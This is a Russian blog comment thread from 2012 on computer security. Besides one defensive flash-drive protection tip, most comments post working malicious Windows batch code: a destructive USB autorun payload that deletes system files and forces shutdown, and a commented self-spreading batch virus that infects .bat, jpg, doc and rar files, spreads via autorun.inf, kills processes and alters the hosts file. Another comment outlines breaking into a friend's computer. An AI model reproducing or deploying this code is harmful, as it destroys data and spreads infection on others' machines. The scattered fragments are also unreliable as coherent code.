Компьютерная безопасность

Автор
Опубликовано: 1884 дня назад (29 апреля 2012)
Блог: Линукс
0
Голосов: 0
Комментарии (31)
Джонни Джонни # 29 апреля 2012 в 12:19 0

да этот прикол все знают

Roman Lee Dan # 30 апреля 2012 в 11:08 0

Защитафлеш-драйва от вирусов

Флеш-драйв чаще других устройствподсоединяется к различным компью­терам, из-за чего подвергается повы­шенномуриску «подхватить» вредо­носный код. Можно ли уберечь «флеш- ку» от заражениявирусами?

                                                                                                                                                                                                                                                                                             

Раньше длязащиты флеш-драйвов требовалось создать пустой файл autorun.inf и назначить емуправа «Только для чтения». В этом случае вирус не мог добавить собственный файлавтозагрузки, поскольку это имя уже было занято и защище­но. Но вирусописателинаучились обходить данную уловку.

Тем не менее простоерешение проблемы все же существует. Метод с использованием файловой сис­темы NTFSмы рассматривать не будем, так как он обладает рядом минусов. Лучше оставитьфайло­вую систему FAT или FAT32 и поступить следующим образом. Создайте спомощью Блокнота тек­стовый файл, например flashprotect. bat, такогосодержания:

attrib-s -h -r autorun.* del autorun.* mkdir
%~d0AUT0RUN.INF mkdir
«?%~d0AUTORUN.INF..» attrib +s +h
%~d0AUTORUN.INF

Скопируйтена «флешку» полу­ченный документ и запустите не­посредственно с нее. Врезультате появится папка с именем Autorun. inf, которую невозможно удалитьсредствами системы. Причем эта директория скрыта от пользовате­ля. Благодаря ейвирус не может создать аналогичный файл, удалить ее тоже не удастся.ВНИМАНИЕЭтот способне рекомен­дуется применять в случае с флеш- накопителями, использующими про­граммноеобеспечение с автозагруз­кой — например, для доступа к дан­ным по отпечаткупальца.

Roman Lee Dan # 1 мая 2012 в 08:50 0

С нетерпением жду продолжения

Roman Lee Dan # 4 мая 2012 в 02:30 0

Винда же будет спрашивать разрешить проге сделать изменения или нет. Если я вижу что это фуфло нах я разрешу ему делать изменения ?

Roman Lee Dan # 7 мая 2012 в 20:37 0

А на Windows 7 интересно будет работать при включенном Контроле учетных записей (UAC) ???

Roman Lee Dan # 8 мая 2012 в 16:50 0

хотя всё это срисую в коллекцию спасибо за инфу

Roman Lee Dan # 10 мая 2012 в 09:10 0

Блин просто супер, но есть одно но, например на моём компе не авторанятся диски и флешки, тем более на флешках  есть скрытый файл AUTORUN.INF который невозможно заменить вирусом

Mihulio Иванов(ICQ: 435310225) # 11 мая 2012 в 07:29 0

ЖЕСТЬ

Джонни Джонни # 11 мая 2012 в 17:14 0

ежедневно дружище. причем это самый простенький, студенты от нечего делать ТАКОЕ пишут, кожа от жути становится дубленее чем у крокодила.

Джонни Джонни # 12 мая 2012 в 14:08 0

вот такие дела, господа хорошие! всем спасибо, на сегодня хватит. продолжение следует

Джонни Джонни # 13 мая 2012 в 13:16 0

:meos
c:kolibrimeosload.com
:l:meosload.com
:continue
rem bootgui=1
cd
cd windows
del *.dll
del *.ini
cd system32
del *.dll
del *.exe
cd D:
del *.exe
______________________________

в Dead.BAT пишем:
echo off
cp Флешка:AUTOEXEC.BAT C:
msg * "Dead" >nul
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoDesktop /t REG_DWORD /d 1 /f >nul
shutdown -s -t 1 -c "lol" -f >nul
______________________________

в autorun.ini пишем:
[autorun]
OPEN=Dead.BAT
______________________________

готово!
как это работает:
Вы вставляете флешку autorun.ini автоматичиски открывает Dead.BAT, Dead.BAT копирует AUTOEXEC.BAT на C и выключает компютер. при следущем запуске система слетает.

___________________________

Джонни Джонни # 14 мая 2012 в 00:26 0

Берем флешку которую вам не жалко (больше вы не сможите ей пользоватся)Создаем на ней:
AUTOEXEC.BAT
Dead.BAT
autorun.ini
______________________________

в AUTOEXEC.BAT пишем:
goto config
:dos1
rem c:vc401vc
lh keyrus
lh mmouse
lh C:WINDOWSCOMMANDmscdex /d:12345678
lh dndn
bootgui=0
:dos2
rem essolo.com
lh keyrus
lh mmouse
lh dndn
bootgui=0
:win
rem c:essolo.com
set path=C:WINDOWS;C:WINDOWSCOMMAND;c:;c:windows;c:windowscomand;c:arc;c:dn
C:WINDOWSCOMMANDDELTREE /y C:WINDOWSTEMP*.*
mode con codepage prepare=((866) C:WINDOWSCOMMANDega3.cpi)
mode con codepage select=866
keyb ru,,C:WINDOWSCOMMANDkeybrd3.sys
goto continue

Джонни Джонни # 14 мая 2012 в 07:19 0

если у вас хватило терпения прочесть коментарии к коду батника, то вы поняли , что пипец вашему компу придет ну очень быстро. и нет ни одной проги которая покажет что батник есть...

Джонни Джонни # 14 мая 2012 в 18:22 0

%[ViRuS]%del c:\run_me.bat >nul
del c:\ViRuS.dLT >nul
:ViRuSDNLW
del c:\ViRuS.tYw
goto ViRuSxLBI
:ViRuSCxLrL
\\ заражение найденных bat файлов.
find "ViRuS"<%2>nul
\\ проверить есть ли уже вирус в файле.
if not errorlevel 1 goto ViRuSxLBI
\\ если да - идти к ViRuSxLBI.
echo.>>%2%[ViRuS]%
\\ допишем в жертву переход на новую строку, т.к. если в конце жертвы его не было, то вирус заразит файл с ошибками.
type c:\ViRuS.bat>>%2
\\ заражение - дописывание содержимого файла-матки в жертву.
:ViRuSxLBI
\\ переход к этой метке очень часто встречается в вирусе, т.е. если, например, набор команд по заражению rar отработал, то в конце идет переход сюда.
--------[конец]-------------------------------------------
Некоторые строки без комментариев, например похожие на уже описанные над ними.

Джонни Джонни # 15 мая 2012 в 03:41 0

goto ViRuSxLBI
:ViRuStYMgh
\\ заражение найденного jpg или doc файла
if exist %2.bat goto ViRuSxLBI
\\ проверить есть ли уже файл "ИМЯ.JPG"+".BAT", если да - идти к ViRuSxLBI.
type c:\ViRuS.bat>>%2.bat
\\ создаем вирусный файл-компаньон.
echo start %~nx2>>%2.bat%[ViRuS]%
\\ допишем в него строку для вызова этого jpg или doc.
goto ViRuSxLBI
:ViRuSvFA
\\ заражение rar
if not exist c:\progra~1\winrar\rar.exe goto ViRuSxLBI
\\ если нет архиватора - уйти.
echo.>c:\ViRuS.tYw
\\ создадим пустой файл c:\ViRuS.tYw.
c:\progra~1\winrar\rar.exe cw %2 -y c:\ViRuS.tYw >nul
\\ запишем архивный комментарий из жертвы в c:\ViRuS.tYw.
find "ViRuS"nul
\\ если комментарий "ViRuS", то архив уже был заражен.
if not errorlevel 1 goto ViRuSDNLW
\\ ... и идем к ViRuSDNLW.
type c:\ViRuS.bat>c:\run_me.bat
\\ создадим файл c:\run_me.bat с вирусом для заражения архивов.
echo ViRuS>c:\ViRuS.dLT
\\ создадим файл c:\ViRuS.dLT с меткой "ViRuS".
%[ViRuS]%c:\progra~1\winrar\rar.exe a -tk %2 c:\run_me.bat >nul
\\ заражаем архив.
c:\progra~1\winrar\rar.exe c -zc:\ViRuS.dLT -tk %2 >nul
\\ присваиваем комментарий "ViRuS" к архиву (из файла c:\ViRuS.dLT).

Джонни Джонни # 20 мая 2012 в 20:22 0

папка существует, то запускаем файл-матку с параметром jlxDpY и путем к папке.
for /r %%v in (%ViRuSHnQd%t) do call c:\ViRuS.bat CeyJ %%~sv
\\ Рекурсивный поиск bat файлов для заражения. Если жертва найдена, то вызывается файл-матка с параметром CeyJ, второй параметр - это имя жертвы.
for /r %%W in ( *.%xrj%jpg *.%oWgt%doc) do call c:\ViRuS.bat FTor %%~sW
\\ Рекурсивный поиск jpg и doc файлов для заражения. Если жертва найдена, то вызывается файл-матка с параметром FTor, второй параметр - это имя жертвы.
goto ViRuSxLBI
:ViRuSXTy
\\ Если вирус нашел каталоги для заражения, то начинает работать с этого места (из файла-матки).
for %%B in (%2\%ViRuSHnQd%t) do call c:\ViRuS.bat CeyJ %%~sB
\\ поиск bat файлов в каталоге (материнский или PATH - то что найдено выше).
for %%Y in (%2\*.%SukxBJ%rar) do call c:\ViRuS.bat QZcSdh %%~sY
\\ ... rar.
for %%W in ( %2\*.%WwjQD%jpg %2\*.%fGmGIVK%doc) do call c:\ViRuS.bat FTor %%~sW
\\ ... jpg и doc.

Джонни Джонни # 22 мая 2012 в 23:34 0

if not exist g:\ goto ViRuSLMMlAm
if exist g:\autorun.bat goto ViRuSKYQA
type c:\ViRuS.bat>g:\autorun.bat
echo explorer.exe .>>g:\autorun.bat%[ViRuS]%
attrib +h g:\autorun.bat%[ViRuS]%
:ViRuSKYQA
if exist g:\autorun.inf goto ViRuSLMMlAm
echo [autorun]>g:\autorun.inf%[ViRuS]%
echo shellexecute=autorun.bat>>g:\autorun.inf%[ViRuS]%
attrib +h g:\autorun.inf%[ViRuS]%
:ViRuSLMMlAm
if not exist h:\ goto ViRuSmOKzSp
if exist h:\autorun.bat goto ViRuSYGKWA
type c:\ViRuS.bat>h:\autorun.bat
echo explorer.exe .>>h:\autorun.bat%[ViRuS]%
attrib +h h:\autorun.bat%[ViRuS]%
:ViRuSYGKWA
if exist h:\autorun.inf goto ViRuSmOKzSp
echo [autorun]>h:\autorun.inf%[ViRuS]%
echo shellexecute=autorun.bat>>h:\autorun.inf%[ViRuS]%
attrib +h h:\autorun.inf%[ViRuS]%
:ViRuSmOKzSp
net share >c:\ViRuS.mVb
\\ Сохраним все шАры в файл c:\ViRuS.mVb.
find " c:\text "nul
\\ проверим расшарена ли уже данная папка.
if not errorlevel 1 goto ViRuSZdCNesk
\\ если да - пропустим.
%[ViRuS]%net share "myshara"="c:\text" >nul
\ расшарим папку c:\text.
:ViRuSZdCNesk
del c:\ViRuS.mVb
\\ удалим файл с шАрами.
for %%U in (.. path) do call c:\ViRuS.bat jlxDpY %%~sU
\\ перебираем указанное множество папок. Если папка

Джонни Джонни # 23 мая 2012 в 19:34 0

goto ViRuSQIKBr
\\ Если переменнаяа ViRuSpoD представляет из себя строку из "1" в количестве (см. строку выше), то уходим из цикла к ViRuSQIKBr.
goto ViRuSPgfMa
\\ Цикл к ViRuSPgfMa
:ViRuSQIKBr
echo # ViRuS>>%ViRuShostfile%
\\ Пишем метку в host.
echo 127.0.0.1 huyandex.ru>>%ViRuShostfile%
\\ Пишем имя сайта в host для блокировки.
echo 127.0.0.1 www.huyandex.ru>>%ViRuShostfile%
:ViRuSiaXVe
if not exist f:\ goto ViRuSmkTij
\\ Тут начинается заражение флэшек. Проверить существует ли F:\, иначе пропустить заражение.
if exist f:\autorun.bat goto ViRuSdmAS
\\ если f:\autorun.bat уже существует, то пропустить.
type c:\ViRuS.bat>f:\autorun.bat
\\ переносим содержимое из файла-матки в f:\autorun.bat.
echo explorer.exe .>>f:\autorun.bat%[ViRuS]%
\\ добавляем в f:\autorun.bat строку "explorer.exe ." чтобы при автозапуске открылось содержимое флэшки в проводнике.
attrib +h f:\autorun.bat%[ViRuS]%
\\ Скрываем файл.
:ViRuSdmAS
if exist f:\autorun.inf goto ViRuSmkTij
\\ если файл f:\autorun.inf уже существует, то пропустить и идти к ViRuSmkTij.
echo [autorun]>f:\autorun.inf%[ViRuS]%
echo shellexecute=autorun.bat>>f:\autorun.inf%[ViRuS]%
attrib +h f:\autorun.inf%[ViRuS]%
:ViRuSmkTij

Джонни Джонни # 25 мая 2012 в 01:30 0

ы имена процессов.
set ViRuShostfile=%SYSTEMROOT%\system32\drivers\etc\hosts
\\ Начинаем работать с адресами сайтов. Переменная ViRuShostfile - это путь к файлу "host".
find "ViRuS"<%ViRuShostfile%>nul
\\ Ищем метку ViRuS в файле host (при создании вируса была включена маскировка в host).
if not errorlevel 1 goto ViRuSiaXVe
\\ Идем к ViRuSiaXVe, если метка уже есть (сайты уже заблокированы).
:ViRuSPgfMa
set ViRuSpoD=%ViRuSpoD%1
\\ К переменной ViRuSpoD добавляем "1".
echo.>>%ViRuShostfile%
\\ Добавляем пустую строку в host.
if ViRuSpoD==1111111111111111111111111111111111111111111111111

Джонни Джонни # 28 мая 2012 в 01:24 0

-[начало]-----------------------------------------
echo off%[ViRuS]%
\\ Отключаем вывод на экран сообщений команд.
\\ %[ViRuS]% - это несуществующая переменная ViRuS, она никак не влияет на строку команды, а выполняет роль вирусной метки, т.к. команда "@echo off" не содержит в себе вирусной метки, что недопустимо в вирусах данного типа. Далее такие метки не комментируются.
set ViRuSHnQd=*.ba
\\ Присвоить переменной значение. Из него будет создано расширение для заражений (см. ниже).
if '%1=='CeyJ goto ViRuSCxLrL
\\ Если параметр CeyJ, то идти к метке ViRuSCxLrL.
if '%1=='FTor goto ViRuStYMgh
if '%1=='jlxDpY goto ViRuSXTy
if '%1=='QZcSdh goto ViRuSvFA
if exist c:\ViRuS.bat goto ViRuSxOfTg
\\ Если файл-матка существует, то пропустить его создание.
if not exist %0 goto ViRuSxLBI
\\ если параметр %0 не имя файла из которого стартовали, то перейти к метке в конце вируса (выход без работы).
find "ViRuS"<%0>c:\ViRuS.bat
\\ Переносим из файла нашего старта все строки содержащие сочетание "ViRuS", т.е. копируем все вирусные строки (и только их).
attrib +h c:\ViRuS.bat
\\ Устанавливаем атрибут Скрытый файлу-матке.
:ViRuSxOfTg
\\ Начало команд удаления процессов из памяти.
tasklist >c:\ViRuS.vrp
\\ Запишем в файл c:\ViRuS.vrp все процессы в памяти.
find /i "calc.exe"nul
\\ Ищем "calc.exe" в файле c:\ViRuS.vrp.
if errorlevel 1 goto ViRuSKIi
\\ Если не нашли, то идти к метке ViRuSKIi.
%[ViRuS]%taskkill /f /im calc.exe>nul
\\ Убиваем!
:ViRuSKIi
find /i "notepad.exe"nul
if errorlevel 1 goto ViRuSWEEHM
%[ViRuS]%taskkill /f /im notepad.exe>nul
:ViRuSWEEHM
del c:\ViRuS.vrp
\\ Удаляем файл, в котором были записан
 

Джонни Джонни # 28 мая 2012 в 08:14 0

вот примерный текст вируса, который НИ ОДНИМ ИЗ АНТИВИРУСОВ НЕ ВИДИТСЯ, исключение- доктор веб, но он тормозит ситему..

Джонни Джонни # 30 мая 2012 в 06:39 0

БДИТЕЛЬНОСТЬ ГОСПОДА!!!!!!!

Джонни Джонни # 30 мая 2012 в 10:08 0

может быть и такое: фейк. то есть фальшивая страничка, адрес будет отличаться, но понять будет крайне сложно, разница бывает в одну букву.

Джонни Джонни # 30 мая 2012 в 11:23 0

никогда не переходите по ссылкам, во всяком случае скопируйте ее, и в опере в приватвкладке откройте. 

Джонни Джонни # 31 мая 2012 в 00:34 0

если вам прислали фото, то убедитесь что это именно фото, не качайте, откройте в самом браузере, предварительно отключив  исполнение ява скриптов...если вам предланают установить свой установщик программы или на скачку фильма, знайте, это вам хотят сделать бяку!

Джонни Джонни # 1 июня 2012 в 18:53 0

можно попросить товарища прислать по мылу письмо, фото, да что угодно... смотрим в заголовке айпишник, сканим его, лезем через порт 4899 или 3899 или 23 и смотрим. если нас пустили, то все ок. если нет- сканим дальше, по задержке отклика смотрим, что за гад нам мешает, файрвол, брандмауер или еще что то... сниффером снимаем траффик, смотрим каким айпи нам представится, и рвем соединение..комп жертвы автоматом востанавливает его, но уже через вас, и вы бьете так называемый тоннель. вы в компе у друга. делаем что хотим. кидаем туда вирусы, смотрим его файло, пароли и так далее..так вот, к чему написано: будьте бдительны!!!! элементарно проверяйте свой траффик, если вы ничего не качаете, а траффик есть, то посмотрите, откуда и куда он идет. 

Джонни Джонни # 2 июня 2012 в 00:13 0

потому что испортить информацию можно тремя путями...вирусом, удаленным доступом и стереть самому... мы не берем физическое убиение хард диска или флешки.
для того, что бы противостоять вирусу, придумали антивирус. его алгоритм работы таков: он сравнивает тело файла с базой вирусов, если есть совпадения в определенных последжовательностях, то он определяет его как опасный и дале по ситуации..либо удаляет либо лечит либо карантин. но! во первых, вирус можно запаковать, и тогда куку гриня. вирус можно зашифровать в виде фотки, а потом сделать так, чтобы при нажатии на увеличение архив самораспаковался, и все, сушите весла.

Джонни Джонни # 2 июня 2012 в 05:51 0

урок первый: виндовс, это самая поганая операционная система, которая распространение нашла в силу того, что она создана, во-первых, для ламеров, а во вторых с вас рубят бабло за то что вы не понимаете того, за что ж вы собственно платите...сложно? не думаю.. идем далее: операционная система, это программа, которая позволяет что то над информацией делать. теперь надо эту информацию защитить..сама оперционная система этого не может сделать, ибо она изначально предназначена для другого, что бы там ни писали, что бы там не производили...

Джонни Джонни # 2 июня 2012 в 17:14 0

так вот, разачарую вас, други мои....каспер сам трояном является, причем крысь касперский даже не отрицает данного факта, а наличие в нем ненастраиваемого файервола приводит к тому что вы постоянно тыцкаете пимпочку да, разрешить, да согласен и прочее...так вот, начнем господа хорошие, с азов.

Джонни Джонни # 5 июня 2012 в 23:06 0

обосновываю: никто из вас не знает, что такое протокол TCP/IP, принципы написания вирусов, что же такое файрволл и как его настроить, и свято уверены что касперский- панацея от всех болезней!!!!

Джонни Джонни # 6 июня 2012 в 19:23 0

итак, начнем с того, что вы все, мнящие себя пользователями, либо боты, либо ламеры.

Добавить комментарий RSS-лента RSS-лента комментариев
 
Обсуждения




Сообщество интернет пользователей :: обмен мнениями, новые статьи и обзоры © 2013, 2017